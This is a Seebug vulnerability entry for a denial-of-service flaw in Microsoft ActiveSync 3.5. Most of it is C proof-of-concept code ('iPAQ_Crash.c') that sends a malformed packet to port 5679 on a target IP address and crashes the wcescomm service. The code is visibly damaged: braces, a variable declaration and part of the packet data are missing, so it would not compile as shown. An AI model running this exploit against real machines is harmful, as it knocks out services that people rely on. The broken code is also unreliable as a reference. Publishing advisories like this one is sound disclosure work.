Microsoft ActiveSync 3.5 Null Pointer Dereference Denial of Service Vulnerability

ID SSV:76195
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.


A problem with ActiveSync could make it possible for remote users to trigger a denial of service.

It has been reported that under some circumstances, the ActiveSync wcescomm service can be forced to crash. Due to improper handling of some requests, the wcescomm process becomes unstable. This can result in the process crashing, requiring a manual restart to resume service.

/* iPAQ_Crash.c - by Andy Davis*/
/* Strictly for testing purposes only */
/* Compile with Microsoft VC++ */

#include <winsock.h>
#include <windows.h>
#include <stdio.h>

#define ASYNC_PORT 5679

int main(int argc, char **argv)

    unsigned char sendBuf[] =

/* Correct Header */

//"\x00\x00\x00\x00" /* Correct start of packet - by removing these 4
bytes the crash occurs */
"\x6e\x00\x00\x00" /* Length of the rest of the packet */
"\xc3\x1d\xdd\x0c" /* 0xc31ddd0c Device Identifier */
"\x24\x00\x00\x00" /* 0x24 pointer to "Pocket_PC" */
"\x38\x00\x00\x00" /* 0x38 pointer to "PocketPC" */
"\x4a\x00\x00\x00" /* 0x4a pointer to "Compaq iPAQ H3800" */

/* "Pocket_PC PocketPC Compaq iPAQ H3800" (in unicode) */


    struct sockaddr_in servAddr;
    int s;

		 		 if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
		 		 		 printf("WSAStartup failed.\n");

		 if (argc != 2)
		 		 printf ("\niPAQ_Crash\n");
		 		 printf ("\nUsage: %s <target IP address>\n",argv[0]);
		 		 exit (1);

    servAddr.sin_family = AF_INET;
    servAddr.sin_addr.s_addr = inet_addr(argv[1]);
    servAddr.sin_port = htons(ASYNC_PORT);

    s = socket(AF_INET, SOCK_STREAM, 0);
    connect(s, (struct sockaddr *) &servAddr, sizeof(servAddr));

    printf("Sending packet...");

		 if ( send(s, sendBuf, 118, 0) == 0)
		 		 printf("Error sending packet...quitting\n\n");
		 		 exit (0);